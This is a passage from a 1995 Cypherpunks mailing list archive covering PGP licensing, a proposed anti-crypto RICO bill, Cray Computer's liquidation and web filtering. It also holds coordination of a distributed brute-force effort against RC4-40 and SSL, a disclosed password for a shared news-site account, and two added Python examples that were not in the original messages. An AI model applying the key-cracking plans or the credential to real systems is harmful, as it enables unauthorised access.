> opinion) answer to this?

As I recall, the following is a correct scenario: a customer can use PGP to
send credit card numbers to a vendor he's making a personal purchase from,
but the vendor must use Viacrypt. If the customer is buying something to use
for business, BOTH  must use Viacrypt.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:56 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <ease9c3w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew.Spring@ping.be (Andrew Spring) writes:

> So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
> uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
> didn't commit the predicate act.  Who?

It doesn't matter. Even if they say "Oops, sorry" later, the best you can
hope for is to get your computer returned as a bushel basket full of junk
parts. More likely it'll end up in some police station with "D.A.R.E."
painted all over it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 17 Jul 95 17:59:58 PDT
To: cypherpunks@toad.com
Subject: Re: TIME pathfinder registration
Message-ID: <199507180059.UAA12182@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Will Kinney <kinney@bogart.Colorado.EDU> writes:
>> I note someone has used "cypherpunks" as a login for TIME Mag's
>> WWW service. ... If so, what's the password?
>
>This was me. The password is "writecode", since Pathfinder didn't allow
>the login and password to be the same.

Perhaps in the future people might use "sknuprehpyc" in such cases?
And of course, don't put the list's email address in.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 18:10:02 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <9507180107.AA03586@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 17 Jul 1995 16:15:10 -0400
>From: tim werner <werner@mc.ab.com>

>... I was talking to one of the sys admins at
>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>because Viacrypt owned the commercial rights.

I should have mentioned that I have no problem with people trying to
make money.  However, it turns out that ViaCrypt is not selling
site-licenses, or even floating licenses, so they actually want to sell
a separate copy for every user that will use it.

As it happens, the aforementioned sys admin had purchased 5 licenses, to
take care of the 2 users he already knew about, and figuring that there
would probably be a couple more wanting to jump on the bandwagon.  He
offered to let me use one of the licenses, but there's no way I can go
and tell my users "we have PGP", if I can't tell everyone that they can
do it.

And, there's no way I can see convincing my boss that we need that many
copies of ViaCrypt, just so everyone in my department can encrypt their
email traffic.

Of course, I realize that none of the above changes the legality.


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 17 Jul 95 13:16:38 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: RC4 crack
Message-ID: <20156.9507172011@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hayden <hayden@krypton.mankato.msus.edu> writes on cpunks:
> So what was the result of the RC4 key cracking thing that happened last 
> week?  It's at 100% but that's all it says.

[I answered this in email but the answer is: all will be told soon]

A brief explanation is called for, basically the 100% is %age
allocated, and there are still a few stragglers being swept.

For a brief explanation have a look at the brute-rc4.html page which I
have now updated:

	http://dcs.ex.ac.uk/~aba/brute-rc4.html

A more detailed report will be posted to cpunks when the last keyspace
has been swept.

We are expecting that no key will be found at this stage, as it was
not sure to begin with that the supplied plaintext/ciphertext was a
correct pair of RC4-40.  Lack of open Micro$oft specs on the workings
of Micro$oft Access meant that we were guessing, and hoping that we
got it right.  The original brute rc4 project was started on the basis
of 'let's brute it and see'.  Looks like nothing will come out.

Several folks have various parts of an RC4 SSL bruter (netscape secure
sockets layer) and are working on sockets based farming tools to allow
this one to be more automated, as there have been key space management
problems with the bruterc4 effort.  Also means a better % of idle time
will be soaked on participating machines, as we will not need to wait
for operators to get in the next morning, or rely on people to
remember which space they have swept to paste back into the confirm
box.

Soon (a week maybe) the respective parties hope to have all this
sorted out, and get ready for a SSL breaking effort.

So outcome of RC4 soon, followed by SSL effort announce in a while.

In the RC4 outcome announce will be a % break down of how much compute
people swept, even some folks on single PCs have swept as much as 1%
of keyspace alone in 1 week.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thresher!thad@netcom.com (Thaddeus J. Beier)
Date: Mon, 17 Jul 95 21:30:29 PDT
To: cypherpunks@toad.com
Subject: Re: Cray Computer liquidating...
Message-ID: <199507180423.VAA01942@thresher>
MIME-Version: 1.0
Content-Type: text/plain




Phil Fraering asks if there is any crypto relevance to CCC liquidating.
There definitely is some.  They were in the middle of building a Cray 3
with .25 Million PIM processors for the NSA.  It was a wild machine,
basically it used the Cray to pass data back and forth very quickly
among the 1 bit processors.  Someone who worked on it said that it
reminded him of Wayner's hypothetical DES cracking machine.

It was never very close to being finished.  It will be interesting to
see if somebody tries to finish it, or if they use some other
platform to use the PIM (processor-in-memory) chips.  I'd love
to see who bids for the half-finished machine at the coming
liquidation...

thad
-- Thaddeus Beier                   email:  thresher!thad@netcom.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Mon, 17 Jul 95 18:22:28 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: RC4 crack
Message-ID: <199507180122.AA21067@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jul 95 21:36:45 +0100 you wrote:

>
>Yep a telnet port is it for both reporting and getting keys, also the
>WWW interface to the same.
>
>> I'd basically like to be able to start the program, nice it, slam it
>> in the background, and forget about it.
>
>Adam
>
Is there an easy way to integrate machines who are not on-net 24-7
into this protocol?  Not all of us have dedicated lines.:)
					Dan Bailey
******************************************************************************
Vote Speaker Newt Gingrich for President!!                     Dan Bailey
Worcester Polytechnic Institute, class of 1997.                 merzbow@ibm.net
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 21:29:05 PDT
To: Phil Fraering        <cypherpunks@toad.com
Subject: Re: Cray Computer liquidating...
Message-ID: <ac3083cd1d021004a397@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:32 AM 7/18/95, Phil Fraering wrote:
>According to a flier from an e-mail list I'm currently
>unwillingly subscribed to, Cray Computer is going out
>of business.
>
>Any comments and/or crypto relevance?

This is Cray Computer, not the older Cray Research.

Cray Computer was developing a GaAs-based computer that used advanced
robotic assembly/packaging. Cray Research spun off the project, led by
founder Seymour Cray, and the two companies were wholly separate. Cray
Research remained in Minnesota, while Cray Computer was located in Colorado
Springs.

The split was largely arranged because Cray Research was unwilling or
unable to fund both the conventional supercomputer lines _and_ the more
experimental machines favored by Seymour Cray. So they let Seymour and the
technology split off, and a stock distribution was arranged (I was a
shareholder of Cray Research at the time, and recall the distribution).

Cray Research is continuing to sell "Crays," including successors of the
original Cray line and various multiprocessor machines based on the Sparc
processor.

Cray Computer was trying to find customers for its Cray 3 and (planned) Cray 4.

The saga of the collapse of Cray Computer has been going on for the past
year or so, with the last several months being the final chance to
reorganize the company and keep it going. They failed, apparently, and now
the final liquidation of assets is about to happen.

Why didn't the Agency bail them out? Not clear, but my guess is that the
advanced _process_ technology of Cray Computer was not so exciting to the
NSA. The "attack of the killer micros," to use Eugene Miya's phrasing, is
wiping out most conventional advanced processor attempts to get
supercomputer speed.

When a single piece of CMOS silicon gets 200-500 MIPS, and a bunch of them
can be put together, it gets pretty hard to justify hyper-expensive GaAs or
Josephson Junction or whatever technologies.

Sad for Seymour Cray, especially as he'd been pumping some of his own
fortune into keeping Cray Computer going, but it's the nature of business.
And he'll bounce back, or take a well-deserved retirement.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 17 Jul 95 13:41:49 PDT
To: hayden@edu.msus.mankato.krypton
Subject: Re: RC4 crack
In-Reply-To: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
Message-ID: <20191.9507172036@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I remember when RSA129 was being done, the program you have you manually 
> get a start location, and then email transparent any results that it 
> got.  The program that doled out areas to search would base those on what 
> had already been mailed in.  I don't know the details of how exactly that 
> worked, however.

Yeah it's quite like that except we're going for sockets, and an SMTP
style protocol.  That way people can write other apps to the protocol,
for instance Andy Brown has an SSL bruter and key management s/w for
NT, and he plans to interface to the 'master' software via this socket
protocol, allows intermixing, so some people will be running direct
IP, others with PCs or behind firewalls will be running via the WWW
interface which also talks the SMTP style stuff to the master, and it
would be possible if desired to write an email gateway to the socket
protocol for interacting with the master.

Also the socket protocol (blame Piete for this clever stuff, and most
of the socket protocol design) is planned to work with arbitrary
levels of masters, so you can start a local master say on your local
network, the local master requests keys of the 'big master', and doles
them out to 'slaves' running on each cpu you have.  When all its
slaves have acked the keyspace it has drawn out from the big master,
it'll ack that bigger keyspace with the bigmaster and draw out some
more keyspace.

> But, if the program could be written in such a way that it was all 
> automatic, mailing in results and automatically (maybe via a telnet 
> port?) getting the information about what to search, that would be most 
> nice. 

Yep a telnet port is it for both reporting and getting keys, also the
WWW interface to the same.

> I'd basically like to be able to start the program, nice it, slam it
> in the background, and forget about it.

Right, niceing seems to be one option another is to suspend it whilst
people are directly logged in, Kevin and some others have tools for
this kind of thing.  Also there was a similar ultra-nice batch job
suspender which came with RSA129, which we might pinch/combine.

The problem with nicing is that most unix schedulers don't seem to
know what nice means,.. you still get a noticeable slow down on
interactive jobs on SGI boxes even if you've got it npri -h 150, and
even though the bruterc4 (and the bruteSSL too) have tiny resident
core sizes.  Also we thought there should be an hours of play option
so you can tell it (the slave) when it is allowed to hammer the
machine, say 6pm - 7am or whatever.

So, yes the idea that you can slam it in the background and forget it
is a very nice one as it ensures max resource usage.  Also it would
allow us to setup a semi-permanent key cracking ring, with slaves that
can support cracking both SSL and RC4, plus whatever anyone else adds
later, you would get to install a new "ability" then your machine
would say know how to do relations for a RSA-512bit or whatever.

Interesting to see how many MIPs can be mustered en masse for this
kind of app.

Adam
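
[Added example, not part of Adam's messages and not the bruterc4 or SSL-bruter code: a toy Python model of the bookkeeping the two "RC4 crack" messages describe, in which a master hands out key ranges and a local master acks upstream only once every one of its slaves has acked. It shows why "100% allocated" can still leave stragglers unswept; all class and method names and the tiny key space are assumptions, and no cipher is involved.]

```python
"""Toy model of two-level key-space bookkeeping (illustrative names, no cipher)."""


class Master:
    """Top-level ("big") master: hands out contiguous ranges and records acks."""

    def __init__(self, total, chunk):
        self.total = total        # size of the whole key space
        self.chunk = chunk        # keys per allocation
        self.next_start = 0       # first key that was never handed out
        self.outstanding = {}     # (start, end) -> holder, handed out but not acked
        self.acked = []           # confirmed (start, end) ranges

    def request(self, who):
        """Return the next unallocated half-open range, or None if none is left."""
        if self.next_start >= self.total:
            return None
        rng = (self.next_start, min(self.next_start + self.chunk, self.total))
        self.next_start = rng[1]
        self.outstanding[rng] = who
        return rng

    def ack(self, rng):
        """Record a range as swept; refuse acks for ranges that are not outstanding."""
        if rng not in self.outstanding:
            raise ValueError(f"range {rng} is not outstanding")
        del self.outstanding[rng]
        self.acked.append(rng)

    def percent_allocated(self):
        return 100.0 * self.next_start / self.total

    def percent_swept(self):
        return 100.0 * sum(end - start for start, end in self.acked) / self.total

    def stragglers(self):
        """Ranges that count as allocated but have not been confirmed."""
        return sorted(self.outstanding.items())


class LocalMaster:
    """Draws one range from its upstream, splits it among local slaves, and acks
    upstream only when every sub-range is acked. It offers the same request/ack
    interface as Master, so local masters can be stacked to any depth."""

    def __init__(self, name, upstream, sub_chunk):
        self.name = name
        self.upstream = upstream
        self.sub_chunk = sub_chunk
        self.current = None       # range currently held from upstream
        self.todo = []            # sub-ranges not yet given to a slave
        self.pending = {}         # sub-range -> slave, given out but not acked

    def request(self, who):
        if not self.todo and not self.pending:
            self.current = self.upstream.request(self.name)
            if self.current is None:
                return None
            start, end = self.current
            self.todo = [(s, min(s + self.sub_chunk, end))
                         for s in range(start, end, self.sub_chunk)]
        if not self.todo:
            return None           # all handed out; waiting for slaves to ack
        sub = self.todo.pop(0)
        self.pending[sub] = who
        return sub

    def ack(self, sub):
        if sub not in self.pending:
            raise ValueError(f"range {sub} is not outstanding")
        del self.pending[sub]
        if not self.todo and not self.pending:
            self.upstream.ack(self.current)   # whole drawn range is now swept
            self.current = None


def demo():
    """Constructed scenario: 4 chunks, 3 swept directly, 1 split among 4 slaves."""
    big = Master(total=1 << 16, chunk=1 << 14)
    lab = LocalMaster("lab", big, sub_chunk=1 << 12)
    for _ in range(3):
        big.ack(big.request("direct"))
    subs = [lab.request(f"cpu{i}") for i in range(4)]
    for sub in subs[:3]:
        lab.ack(sub)              # three slaves report in, one is still running
    before = (big.percent_allocated(), big.percent_swept(), big.stragglers())
    lab.ack(subs[3])              # last slave acks, so the lab acks upstream
    after = (big.percent_allocated(), big.percent_swept(), big.stragglers())
    return before, after


if __name__ == "__main__":
    for label, state in zip(("before", "after"), demo()):
        print(label, state)
```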





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 17 Jul 95 23:27:24 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180522.AA01543@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

To: danisch@ida.uka.de
Hadmut Danisch writes:

>I am not familiar with American laws and have two questions:

>1. If the bill becomes law, how can someone who violates it be
>punished? 

A criminal RICO violation can be punished by up to 20 years' imprisonment,
as well as forfeiture of any personal or real property constituting
or derived from proceeds of racketeering activity. A convicted RICO
defendant can be fined up to twice the gross profits of the 
racketeering activity. If the defendant disposes of property otherwise
subject to forfeiture, other property owned by the defendant (of equivalent
value) may be seized and forfeited. 18 USC 1963.

RICO also allows private parties injured by a RICO violation to bring a
civil suit and recover three times their actual damages, plus attorneys'
fees and costs. A criminal conviction will operate to estop a RICO 
defendant from denying the facts underlying the criminal conviction in a
subsequent civil suit. 18 USC 1964.

>2. Does someone who publishes software which encodes or encrypts 
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do? 

The defendant has to prove that s/he provided the decoder, because 
providing the decoder is an affirmative defense. That puts the burden
of proof on the defendant on that issue. Were the statute worded that
not providing the decoder were an element of the crime, then the
government would need to prove that the defendant hadn't provided it. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 17 Jul 95 23:27:27 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180523.AA01552@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: Andrew.Spring@ping.be
Andrew Spring writes:

>So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
>uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
>didn't commit the predicate act.  Who?

RICO does not require that either the enterprise or the predicate acts
were motivated by (hope of) economic gain. _National Organization for Women
v. Scheidler_, 114 S.Ct. 798, 127 L.Ed.2d 99 (1994) or
ftp://ftp.cwru.edu/hermes/ascii/92-780.ZO.filt

Looks like Bob Dornan wants to change that, though (probably because RICO
was used to sue anti-abortion terrorists). He introduced HR 230 which
would amend 18 USC 1961(5) to require "profit-seeking purpose" to establish
a RICO "enterprise". THOMAS says that HR 230 is in the House Judiciary
Committee. 

RICO is at http://www.law.cornell.edu:80/uscode/18/ch96.html et seq :) 
for the curious.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 20:37:08 PDT
To: cypherpunks@toad.com
Subject: Cray Computer liquidating...
Message-ID: <199507180332.AA24106@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



According to a flier from an e-mail list I'm currently
unwillingly subscribed to, Cray Computer is going out
of business.

Any comments and/or crypto relevance?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Mon, 17 Jul 95 13:53:45 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <v01510101ac3061b81c9d@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>I am not familiar with American laws and have two questions:
>
>1. If the bill becomes law, how can someone who violates it be
>punished?
>

- From the top of my head:
Subpoena your service provider's computer records.  Intimidate your roommate
into testifying against you.  Tapping your phone.  Entrapping you into
doing it.

Feds are in the business of putting people behind bars.  They are _very_ good
at it.

>
>2. Does someone who publishes software which encodes or encrypts
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do?

I'm betting that the Feds will adopt as a working definition anything that
requires a key to decrypt the communications.  That means compression
software, rot13, and most hash functions are ok.

>
>In the former case, does he get any receipt from the department of
>justice and what does the receipt say (1.3MByte of software
>received...)?
>

This is the U.S. Government.  They Have Forms.  You just file form
THX1138/KGB666-007, omitting pages 113-115 and substituting Addendum Foxtrot
Uniform Delta; then you're covered.

>In the latter case, how do they want to prove he didn't? If he gave
>just a big
>
>  for(i=0;;i++) try_key(i);
>
>how do they want to prove this doesn't work? There is a certain
>problem in theory. I don't know the English name, but in German it is

It's the Halting Problem, in English.

Expert Testimony:  "We experimented with 113,296 keys chosen at random and
the defendant's algorithm took an average of 29,000 years to find each one.
It is our professional opinion, therefore, that the defendant is jacking us
around and ought to be keelhauled".


ObPGP:

Incidentally, did you know that PGP puts a "- " in front of a line that
begins with the word "From"?  Just so "sendmail" doesn't hose your
signatures, I spoz.

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.
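
[Added example, not part of the original message and not PGP's own code: a Python sketch of the dash-escaping mentioned under "ObPGP" above, following the rule later written down in RFC 4880 section 7.1 (lines starting with "-" are prefixed with "- ", and lines starting with "From " should be too). It models mbox-style "From " quoting and uses SHA-256 as a stand-in for the signed hash; the function names and the sample body are constructed for illustration.]

```python
import hashlib

# Constructed sample body; its first line begins with "From ".
SAMPLE = ("From the top of my head:\n"
          "Subpoena your service provider's computer records.\n"
          "-- \n"
          "constructed signature line")


def dash_escape(text, escape_from=True):
    """Prefix "- " to lines starting with "-" and, optionally, with "From "."""
    def needs_escape(line):
        return line.startswith("-") or (escape_from and line.startswith("From "))
    return "\n".join("- " + line if needs_escape(line) else line
                     for line in text.split("\n"))


def dash_unescape(text):
    """Verifier side: strip one leading "- " from every line that carries it."""
    return "\n".join(line[2:] if line.startswith("- ") else line
                     for line in text.split("\n"))


def mbox_from_quote(text):
    """Model of mbox storage: a body line starting with "From " is rewritten to
    ">From " so it is not mistaken for the start of the next message."""
    return "\n".join(">" + line if line.startswith("From ") else line
                     for line in text.split("\n"))


def digest(text):
    """Stand-in for the hash the signature covers (SHA-256 is an assumption)."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def survives_mbox(body, escape_from):
    """True if the text the verifier reconstructs hashes to what the signer hashed."""
    framed = dash_escape(body, escape_from)      # what the signer sends
    stored = mbox_from_quote(framed)             # what the mail store keeps
    recovered = dash_unescape(stored)            # what the verifier hashes
    return digest(recovered) == digest(body)


if __name__ == "__main__":
    print(dash_escape(SAMPLE))
    print("with From-escaping:   ", survives_mbox(SAMPLE, escape_from=True))
    print("without From-escaping:", survives_mbox(SAMPLE, escape_from=False))
```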






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Mon, 17 Jul 95 13:53:48 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510102ac3065ad0aaa@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>You _were_ using that software on a _computer_ weren't you?  Guess it's
>one of your racketeer's tools, so we'll have to take it for ourselves, er, um,
>for evidence and protection of national security....

This wasn't really my point.  Grassley's bill implies that uploading crypto
to an overseas FTP site would qualify as a predicate act, needed for a RICO
seizure.  I think he is assuming that someone would do this for the
purposes of making money: and that anything bought with that money would be
RICOable.  I don't think he or anyone else in Congress is aware that people
tend to do this stuff for free.

I remember one of the sponsors of the CDA ranting about pornographers
"profiteering" from pornographic images on the Internet, blissfully unaware
that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't
profit anyone but the phone company (for the hours you stay online to get
it).

So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
didn't commit the predicate act.  Who?


-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 17 Jul 95 21:35:10 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
In-Reply-To: <199507170827.BAA12427@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950717233255.1828A-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jul 1995, Bill Stewart wrote:

> > > So, anyone want to volunteer to port Privtool to Windows ?
> > Uh, pardon my ignorance, but what is privtool, and why is it
> > a good thing to port it to windows?
> > (As compared to the task of integrating PGP into microsofts
> > mail tool.)
> 
> It's an open-system mail tool resembling Sun's mailtool with PGP support added.
> Open-system tools are one of those vanguard things :-)  
> (So are convenient GUI-development tools.)
> I no longer have a nearby Sun machine to play on, so I haven't played with it,
> but if it's got a well-done interface it's worth porting or stealing concepts
> from to include in other systems.  I've heard that Microsoft's new mail tools
> are far less brain-damaged than the Microsoft Mail I've grown to know and hate,
> which assumes any message that's more than a few lines will be an attached
> document with maybe some optional intro and leftover mail headers,
> and chokes on messages with more than 30K of text in the body (choking badly
> on more than 64K).  (Apparently, part of the reason for this evil is the fault
> of Visual Basic and/or Visual C++, which are convenient GUI development
> tools...)
> 
> On the other hand, integrating it into Free Eudora for Windows would be pleasant,
> if that's doable (I forget if source is available.) 
> #                                Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com

Does Privtool support POP3 ??

-Mike

**************************************************************************
*                                                                        * 
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Tue, 18 Jul 95 00:17:26 PDT
To: cypherpunks@toad.com
Subject: SurfWatch for employees (ugh)
Message-ID: <199507180636.AA02056@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Consistent with the trend towards treating employees like children,
Webster Network Strategies has announced (but apparently has not
shipped) a product similar to SurfWatch but aimed at an employment
environment. The product is called "WebTrack" and supposedly supports
access lists of URLs, where access can be allowed to "all but these sites"
or "only to these sites". The product also can be configured to log all 
Web usage by users subjected to its reign of terror. :) WebTrack 
is priced at $7,500 with an annual subscription to its list of 
interesting (err, forbidden) sites priced at $1,500. The article in the
7/10/95 Infoworld doesn't list contact information for Webster
Network Strategies. 

What is it, two months between deployment of software designed to restrict
net access to one segment of the population perceived as especially
vulnerable and the subsequent application of that technology to other 
target groups? My bet is the next target group will be university 
students, followed by "affinity marketing" with various repressive
organizations (whose names I elide in the interests of greater
Cypherpunk harmony, pick your own and imagine them here.) 

Of course, the next step is to use restrictive licensing/distribution
terms (a la Netscape/Mozilla) and a nifty freeware/software package
available only from a site which also carries porn (or other forbidden
fruit) to make the customers/purveyors of this crap twist in the wind
a bit. Break the terms of the license and get the software somewhere
else? Avoid using the coolest new thing because you're hooked up via
we'll-think-for-you.net? Doh.

(Pedants need not point out that personal choice (and personal filtering)
are always appropriate, and indeed empowering. Neither WebTrack nor
NetSurf are marketed to help people subject themselves to a regime
of repression - they are intended and sold to allow the purchaser to
control what others (perceived as having fewer or no rights) will read
and view. ". . inasmuch as you have done it unto one of the least of
these my brethren, ye have done it unto me." Matthew 25:45)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Mon, 17 Jul 95 20:51:42 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on remailers...
Message-ID: <v02130505ac3063d78727@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:00 7/17/95, Peter Wayner wrote:
>The WSJ has an article on anonymous remailers buried in the B section. It
>is pretty straightforward and ends up quoting some Finnish police officer
>saying that they're not going to go raiding remailers on any suspicion.
>They'll need a real crime.

That Finnish comment is probably due to the fall-out/flap from their raid
on anon.penet.fi in the CoS case.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:46 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Root Causes Roots
Message-ID: <199507180649.XAA25403@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 7/17/95 -0400, Jim Ray wrote:
[ Crypto timeline and discussion omitted ]
>Careful thought reveals a strong suspicion that the "3/5ths people" 
>[slaves] had more use for crypto at the time than free white males 
>did, but I doubt much, if any, evidence of that activity was 
>preserved, and I'm sure it was _forcefully_ discouraged if ever
>discovered...My point is, slaves, or those who live in fear of 
>eventual slavery, for whatever reason, have a strong affinity for 
>cryptography. Note, for example, early use [mentioned in the timeline
>above] by the Jewish people.

Or, more precisely, they have a strong affinity for private in-group
communications.
Cryptography's a bit tough in an environment where it was often illegal to
teach slaves to read.  On the other hand, oral cultures are often good at
using metaphor and in-jokes and shared knowledge to express things that
the speaker doesn't want the oppressive group to understand.  I've seen
commentaries talking about that in North American black culture, and there
are other examples like Cockney rhyming slang.  And then, of course, there
are totally incomprehensible communication systems like Gaelic :-), which
the Brits tried hard to stamp out.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:54 PDT
To: tim werner <cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507180649.XAA25411@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 7/17/95 -0400, tim werner wrote:
>>... I was talking to one of the sys admins at
>>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>>because Viacrypt owned the commercial rights.

Actually, it's less clear than that.  It's pretty clear what you can
do with ViaCrypt code; just read the license to see who can use it,
and you can send any kind of messages you want over it, even for money.

On the other hand, the definitions of "non-commercial use" for RSAREF and
